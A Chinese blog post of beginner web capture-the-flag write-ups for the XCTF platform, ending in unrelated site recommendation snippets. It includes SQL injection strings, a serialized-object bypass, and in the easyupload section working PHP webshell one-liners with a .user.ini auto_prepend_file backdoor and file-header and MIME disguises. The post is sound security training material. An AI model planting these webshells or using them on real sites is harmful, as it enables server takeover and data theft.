攻防世界题目练习——Web难度1(一)_robots:61.147.171.105:60848-程序员宅基地

技术标签: web安全  ctf  题目  Web  攻防世界题目练习  攻防世界  

1. Training-WWW-Robots

在这里插入图片描述
robots.txt 文件是一个文本文件,使用任何一个常见的文本编辑器,就可以创建和编辑它。robots.txt 是一个协议,而不是一个命令。 robots.txt 是搜索引擎中访问网站的时候要查看的第一个文件。robots.txt 文件告诉爬虫程序在服务器上什么文件是可以被查看的。

当一个搜索爬虫访问一个站点时,它会首先检查该站点根目录下是否存在 robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索爬虫将能够访问网站上所有没有被口令保护的页面。

打开文件robots.txt,查看文件内容,发现有默认不允许访问的文件fl0g.php。
在这里插入图片描述
再访问文件fl0g.php
http://111.198.29.45:56243/fl0g.php
于是得到flag

2. PHP2

对目标网站进行目录扫描(用dirsearch没扫出来,又用御剑扫描尝试了几次,感觉有时候有的目录没扫描出来,有时候又可以)
在这里插入图片描述
index.php页面与直接访问链接没有变化。

.phps文件就是 php 的源代码文件,通常用于提供给用户(访问者)查看 php 代码,因为用户无法直接通过 Web 浏览器看到 php 文件的来内容,所以需要用 phps 文件代替。
在这里插入图片描述
查看phps的源码可以看到,对获取的id参数进行url解码后的id内容如果为admin,则可获得flag,并且不允许直接获取的id为admin,但传入在url的参数本身在获取时就会经历一次url解码,因此要对admin进行两次编码。
在这里插入图片描述
将两次url编码后的内容作为id参数上传后
在这里插入图片描述

3. unserialize3

打开题目看到代码如下(忽略url链接上问号之后的内容):
在这里插入图片描述
关键要素是函数 function __wakeup(),结合题目名称unserialize,可以想到php的反序列化,具体关于php的序列化的内容参考该博客->深度剖析PHP序列化和反序列化

__wakeup()是用在反序列化操作中。unserialize()会检查存在一个__wakeup()方法。如果存在,则先会调用__wakeup()方法。

PHP反序列化漏洞:执行unserialize()时,先会调用__wakeup()。
当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。

实例化xctf类后的对象序列化后的内容为O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;},也就是说xctf类只有1个类属性$flag,为了绕过wakeup函数,将序列化字符串中的属性值个数改为大于实际个数1的数,例如改成2,即可绕过。

修改url如上图,访问url:http://61.147.171.105:60349/?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;},即可获得flag。

4. ics-06

拿到题目的时候发现只有报表中心页面可以用,忘了观察url,url上有参数id,通过暴力破解id的值拿到flag。
在这里插入图片描述

5. view_source

题目说让查看源码但不能用右键,印象里f12是可以的,但是电脑按f12一直弹出应用,后来发现要Fn+f12才行。于是查看到源码拿到flag。
在这里插入图片描述
根据WriteUp里的解答可以看到BurpSuite里也可以看到源码,将页面抓包,send repeater,在responds里查看到源码。

6. get_post

进入题目后首先看到题目说让用get方法传递一个名为a值为1的参数。
GET方法传递参数很简单,直接在url后面用?请求,不同参数用&隔开。
在这里插入图片描述
如上图,直接在url后面加上?a=1,即可进入下一个步骤,用POST方式提交一个名为b值为2的变量,也就是提交b=2。

GET方式直接在url上提交参数,POST方式需要在请求体body中提交,题目的页面本来就是GET请求方式,GET方式与POST方式的头部信息略有不同,POST中增加了Content-Type、Content-Length等信息,详见以下博客:
GET和POST的区别以及传参详细解说
HTTP请求报文格式 GET和POST
Get方法和Post方法的区别详解~

但是只知道将方式修改为POST,除此之外还是不知道如何添加Content-Type这些信息,一开始在BurpSuite中的repeater里没有添加这几条信息,尝试send之后response的响应内容出错。查看用户lonely_wei的WriteUp之后,发现可以直接在右边侧栏Inspector里修改请求类型与传递参数,以这种方式添加要传递的参数时左边报文内容上会自动添加Content-Type,再次send就成功得到了带有flag的响应。
在这里插入图片描述
除了在repeater里,在Proxy里也可以用这种方法直接修改截获的报文然后发送。
在这里插入图片描述

7. robots

进入网址什么都没有,直接查看robots.txt
在这里插入图片描述
可以看到有隐藏文件 f1ag_1s_h3re.php ,于是访问,获得flag
在这里插入图片描述
(第一道完全不看WriteUp拿到flag的题呜呜)

8. backup

常见的文件备份后缀有:
.git” 、“.svn”、“ .swp”、“.~”、“.bak”、“.bash_history”、“.bkf

可以直接用御剑扫描php目录,也可以一个后缀一个地尝试,最后发现.bak后缀是可以用的,会弹出一个文件让下载,然后打开文件看到flag。
在这里插入图片描述
在这里插入图片描述

9. cookie

进入网址后,页面显示“你知道什么是cookie吗”,于是用BurpSuite抓包,看到cookie内容如下:
在这里插入图片描述
cookie处显示查看cookie.php文件,于是访问该文件,看到页面显示“查看respons”,于是将访问cookie.php的页面抓包,send repeater,send,查看response,可以在头部看到flag,如下图:
在这里插入图片描述

10. disabled_button

按钮不能按,题目说是前端知识,于是查看源码,查看到有一行是按钮的属性,我们将disabled=""删掉,于是按钮可以按了,按下按钮得到flag。

disabled 属性规定应该禁用的 元素。被禁用的 input 元素是无法使用和无法点击的。
在这里插入图片描述
第二个方法是POST提交auth=flag
具体分析见该博客:XCTF_Web_新手练习区:disabled_button

11. weak_auth

自己最开始就是随便输入了admin和123456,然后去抓包爆破。
一开始以为用户名和密码都要爆破,于是在网上找了很多字典。
发现量实在是太庞大,就随便看了一条爆破的响应报文,发现要求用用户名admin尝试,于是打算重新来,放过了最开始尝试的那条报文,没想到flag就出来了,也是有点运气的。
记住下次不要上来就爆破,先随便输一下用户名密码提交一下看看提示,然后再去爆破。

12. simple_php

php代码如图:
在这里插入图片描述
php中 == 是弱等于,两边的类型不同,则先是将类型转换成相同的,再进行比较。
参考博客:
PHP弱等于(==)绕过和is_number()函数的绕过

is_numeric函数会判断如果是数字和数字字符串则返回 TRUE,且php中弱类型比较时,会使(‘1234a’ == 1234)为真。
参考博客:
simple_php - is_numeric() 绕过与 ==的绕过

本文用a=''获得前半部分的flag。

13. baby_web

一进入网址显示这个页面是1.php,题目提示说初始页面,于是输入index.php,但还是会跳转到1.php,经验不多于是查看WriteUp,发现要访问index.php的时候抓包查看response,如下图:
在这里插入图片描述
可以看到response里有flag,并且是一个重定向的响应报文,重定向到了1.php。

14. inget

在这里插入图片描述
如题,让输入id并绕过,一道sql注入。
尝试直接 id=' ,页面不变,没有报错;
尝试 id=1 and 1=2 --+,页面不变,没有报错;
尝试 id=1 or 1=1 --+,页面不变;
尝试id=1' or 1=1 --+,出现flag。

15. easyupload

将一句话木马改成图片,尝试了黑名单绕过中的大小写绕过、重写绕过、特殊可解析后缀绕过、. htaccess绕过、使用Windows特性绕过、%00截断,都不行,于是查看WriteUp。

官方给出的需要绕过的点有:
(1)检查文件内容是否有php字符串
(2)检查后缀中是否有htaccess或ph
(3)检查文件头部信息
(4)文件MIME类型

针对(1),以前只知道一句话木马<?php @eval($_POST[1]);?>,这次知道了有一种短标签,<?=phpinfo();?>
参考博客:php中的短标签
并通过qiuliangfz的WriteUp知道了eval的作用:
<?=eval($_POST['cmd']);?> //eval(str)函数把str字符串按照php代码来运行

针对(2),查看WriteUp后知道,在网站限制上传php文件时,可以利用.user.ini作为辅助来上传图片木马。参考文章如下:
.user.ini文件构成的PHP后门
它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。
其中很多功能设置了只能php.ini配置,但是还是有一些危险的功能可以被我们控制,比如auto_prepend_file
php.ini中有两项
auto_prepend_file 在页面顶部加载文件
auto_append_file 在页面底部加载文件
新建一个文件名叫.user.ini 文件内容为:

GIF89a
auto_prepend_file=a.jpg//让同目录下的所有php文件都包含a.jpg里的内容

针对(3),GIF89a 即是图片头文件欺骗,让后台以为这是图片。
针对(4),将.user.ini上传上去,同时用BurpSuite抓包,将Content-Type修改为Content-Type:image/jpg。
新建一个a.txt文件,写入如下内容:

GIF89a
<?=eval($_REQUEST['cmd']);?>//也可以是eval($_POST['cmd']),也可以是上传命令执行代码system('cat /flag')而不是木马
//或者写入:
GIF89a
<?=system('cat /flag');?>

或写入最开始的一句话木马:

GIF89a
<?=eval($_POST[1]);?>

再将后缀名修改为jpg,然后上传,这个文件可以绕过前面的4项检查,但是上传的是jpg文件不会直接被当作php来执行,因此需要前面的.user.ini文件来将这个文件添加到其他的php文件中来执行。

具体操作过程如下:
编写.user.ini文件:
在这里插入图片描述
上传文件并BurpSuie修改请求头中的ContentType:
在这里插入图片描述
编写a.txt并修改后缀为jpg:
在这里插入图片描述
上传a.jpg并查看上传文件所在路径:
在这里插入图片描述
蚁剑成功连接并看到flag文件:
在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48550824/article/details/132477815

智能推荐

class和struct的区别-程序员宅基地

文章浏览阅读101次。4.class可以有⽆参的构造函数,struct不可以,必须是有参的构造函数,⽽且在有参的构造函数必须初始。2.Struct适⽤于作为经常使⽤的⼀些数据组合成的新类型,表示诸如点、矩形等主要⽤来存储数据的轻量。1.Class⽐较适合⼤的和复杂的数据,表现抽象和多级别的对象层次时。2.class允许继承、被继承,struct不允许,只能继承接⼝。3.Struct有性能优势,Class有⾯向对象的扩展优势。3.class可以初始化变量,struct不可以。1.class是引⽤类型,struct是值类型。

android使用json后闪退,应用闪退问题:从json信息的解析开始就会闪退-程序员宅基地

文章浏览阅读586次。想实现的功能是点击顶部按钮之后按关键字进行搜索,已经可以从服务器收到反馈的json信息,但从json信息的解析开始就会闪退,加载listview也不知道行不行public abstract class loadlistview{public ListView plv;public String js;public int listlength;public int listvisit;public..._rton转json为什么会闪退

如何使用wordnet词典,得到英文句子的同义句_get_synonyms wordnet-程序员宅基地

文章浏览阅读219次。如何使用wordnet词典,得到英文句子的同义句_get_synonyms wordnet

系统项目报表导出功能开发_积木报表 多线程-程序员宅基地

文章浏览阅读521次。系统项目报表导出 导出任务队列表 + 定时扫描 + 多线程_积木报表 多线程

ajax 如何从服务器上获取数据?_ajax 获取http数据-程序员宅基地

文章浏览阅读1.1k次,点赞9次,收藏9次。使用AJAX技术的好处之一是它能够提供更好的用户体验,因为它允许在不重新加载整个页面的情况下更新网页的某一部分。另外,AJAX还使得开发人员能够创建更复杂、更动态的Web应用程序,因为它们可以在后台与服务器进行通信,而不需要打断用户的浏览体验。在Web开发中,AJAX(Asynchronous JavaScript and XML)是一种常用的技术,用于在不重新加载整个页面的情况下,从服务器获取数据并更新网页的某一部分。使用AJAX,你可以创建异步请求,从而提供更快的响应和更好的用户体验。_ajax 获取http数据

Linux图形终端与字符终端-程序员宅基地

文章浏览阅读2.8k次。登录退出、修改密码、关机重启_字符终端

随便推点

Python与Arduino绘制超声波雷达扫描_超声波扫描建模 python库-程序员宅基地

文章浏览阅读3.8k次,点赞3次,收藏51次。前段时间看到一位发烧友制作的超声波雷达扫描神器,用到了Arduino和Processing,可惜啊,我不会Processing更看不懂人家的程序,咋办呢?嘿嘿,所以我就换了个思路解决,因为我会一点Python啊,那就动手吧!在做这个案例之前先要搞明白一个问题:怎么将Arduino通过超声波检测到的距离反馈到Python端?这个嘛,我首先想到了串行通信接口。没错!就是串口。只要Arduino将数据发送给COM口,然后Python能从COM口读取到这个数据就可以啦!我先写了一个测试程序试了一下,OK!搞定_超声波扫描建模 python库

凯撒加密方法介绍及实例说明-程序员宅基地

文章浏览阅读4.2k次。端—端加密指信息由发送端自动加密,并且由TCP/IP进行数据包封装,然后作为不可阅读和不可识别的数据穿过互联网,当这些信息到达目的地,将被自动重组、解密,而成为可读的数据。不可逆加密算法的特征是加密过程中不需要使用密钥,输入明文后由系统直接经过加密算法处理成密文,这种加密后的数据是无法被解密的,只有重新输入明文,并再次经过同样不可逆的加密算法处理,得到相同的加密密文并被系统重新识别后,才能真正解密。2.使用时,加密者查找明文字母表中需要加密的消息中的每一个字母所在位置,并且写下密文字母表中对应的字母。_凯撒加密

工控协议--cip--协议解析基本记录_cip协议embedded_service_error-程序员宅基地

文章浏览阅读5.7k次。CIP报文解析常用到的几个字段:普通类型服务类型:[0x00], CIP对象:[0x02 Message Router], ioi segments:[XX]PCCC(带cmd和func)服务类型:[0x00], CIP对象:[0x02 Message Router], cmd:[0x101], fnc:[0x101]..._cip协议embedded_service_error

如何在vs2019及以后版本(如vs2022)上添加 添加ActiveX控件中的MFC类_vs添加mfc库-程序员宅基地

文章浏览阅读2.4k次,点赞9次,收藏13次。有时候我们在MFC项目开发过程中,需要用到一些微软已经提供的功能,如VC++使用EXCEL功能,这时候我们就能直接通过VS2019到如EXCEL.EXE方式,生成对应的OLE头文件,然后直接使用功能,那么,我们上篇文章中介绍了vs2017及以前的版本如何来添加。但由于微软某些方面考虑,这种方式已被放弃。从上图中可以看出,这一功能,在从vs2017版本15.9开始,后续版本已经删除了此功能。那么我们如果仍需要此功能,我们如何在新版本中添加呢。_vs添加mfc库

frame_size (1536) was not respected for a non-last frame_frame_size (1024) was not respected for a non-last-程序员宅基地

文章浏览阅读785次。用ac3编码,执行编码函数时报错入如下:[ac3 @ 0x7fed7800f200] frame_size (1536) was not respected for anon-last frame (avcodec_encode_audio2)用ac3编码时每次送入编码器的音频采样数应该是1536个采样,不然就会报上述错误。这个数字并非刻意固定,而是跟ac3内部的编码算法原理相关。全网找不到,国内音视频之路还有很长的路,音视频人一起加油吧~......_frame_size (1024) was not respected for a non-last frame

Android移动应用开发入门_在安卓移动应用开发中要在活动类文件中声迷你一个复选框变量-程序员宅基地

文章浏览阅读230次,点赞2次,收藏2次。创建Android应用程序一个项目里面可以有很多模块,而每一个模块就对应了一个应用程序。项目结构介绍_在安卓移动应用开发中要在活动类文件中声迷你一个复选框变量

推荐文章

热门文章

相关标签